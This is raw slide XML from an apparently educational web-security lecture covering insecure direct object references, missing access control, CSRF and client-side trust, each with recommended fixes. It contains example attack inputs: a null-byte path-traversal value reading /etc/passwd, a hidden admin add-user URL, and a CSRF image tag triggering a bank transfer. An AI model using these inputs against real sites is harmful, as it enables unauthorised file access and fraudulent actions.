              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://shop.com/cart?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>413246</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="220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800" smtClean="0"/>
              <a:t>(your cart)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://shop.com/cart?id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>123456  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" smtClean="0"/>
              <a:t>(someone else’s cart ?)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to files:</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://s.ch/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home          </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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200" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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200" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>home.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2200" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://s.ch/?page=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/etc/passwd%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC33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200" b="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1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200" b="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/etc/passwd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" i="1" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Solution: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>avoid exposing IDs, keys, filenames </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to users if possible</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validate</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> input, accept only correct values</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>verify authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>to all accessed objects (files, data etc.)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Rounded Rectangular Callout 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7143750" y="4643438"/>
            <a:ext cx="1700213" cy="928687"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRoundRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 46393"/>
              <a:gd name="adj2" fmla="val -100234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>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>string ends at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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%00</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, so </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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.php </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>not added</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40658508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A7: Missing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Function Level Access Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8704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“Hidden” URLs that don’t require further authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to actions:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin/adduser?name=x&amp;pwd=x</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pP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	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(even if  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>admin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> requires authorization)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="600" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>to files:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	http://site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>internal/salaries.xls</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2200" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	http://me.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2200" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>No/One/Will/Guess/82534/me.jpg</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="3">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Problem: missing authorization</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Solution</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>add missing authorization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t></a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:sym typeface="Wingdings" pitchFamily="2" charset="2"/>
              </a:rPr>
              <a:t>don‘t rely on security by obscurity – it will not work!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5849607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704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A8: Cross-site request forgery</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8499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en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cross-site request forgery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (CSRF) – a scenario</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Alice logs in at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, and forgets to log out</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Alice then visits a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>evil.com </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> (or just </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>webforums.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>), with:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="-266700">
              <a:buFont typeface="Arial" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="21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100" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>http://bank.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100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2100" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>transfer?amount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=1000000&amp;to_account=123456789</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>"&gt;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>Alice‘s browser wants to display the image, so sends </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>a request to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>, without Alice’s consent</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>if Alice is still logged in, then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" u="sng" dirty="0" smtClean="0"/>
              <a:t>bank.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> accepts the request and performs the action, transparently for Alice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(!)</a:t>
            </a:r>
            <a:endParaRPr lang="pl-PL" sz="2100" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="800" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="CC3300"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>There is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>no simple solution</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>, but the following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pl-PL" sz="2400" dirty="0" smtClean="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>help:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="pl-PL" sz="2100" dirty="0" smtClean="0"/>
              <a:t>expire early user sessions, encourage users to log out</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>use “double submit” cookies and/or secret hidden fields</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t>use POST rather than GET, and check </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" err="1" smtClean="0"/>
              <a:t>referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" dirty="0" smtClean="0"/>
              <a:t> value</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2100" dirty="0" smtClean="0">
              <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New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492284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546" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3349625" y="179388"/>
            <a:ext cx="1865313" cy="692150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="76200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1379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Client-server –  no trust</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="89092" name="Rectangle 6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z="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security on the client side doesn’t work</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t> (and cannot)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>don’t rely on the client to perform security checks (validation etc.) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=”text” maxlength=”20”&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t> is not enough</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>authentication should be done on the server side, not by the client </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Don’t trust your client</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2300" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>HTTP response header fields like referrer, cookies etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>HTTP query string values (from hidden fields or explicit links)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>e.g. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;input type=”hidden” name=”price” value=”299”&gt;</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2000" smtClean="0">
                <a:latin typeface="Courier New" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" pitchFamily="49" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2100" smtClean="0"/>
              <a:t>in an online shop can (and will!) be abused</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Do all security-related checks on the server</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Don’t expect your clients to send you SQL queries, </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>shell commands etc. to execute – it’s not your code anymore</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" smtClean="0"/>
              <a:t>Put limits on the number of connections, set timeouts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="31942750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5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365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365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2365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6546" grpId="0" animBg="1"/>
      <p:bldP spid="89092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785813" y="4500563"/>
            <a:ext cx="2714625" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFF99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240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Advice</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8704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solidFill>
                  <a:srgbClr val="CC3300"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Protect code and data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>– make sure they can’t be </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>simply accessed / downloaded:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:defRPr/>
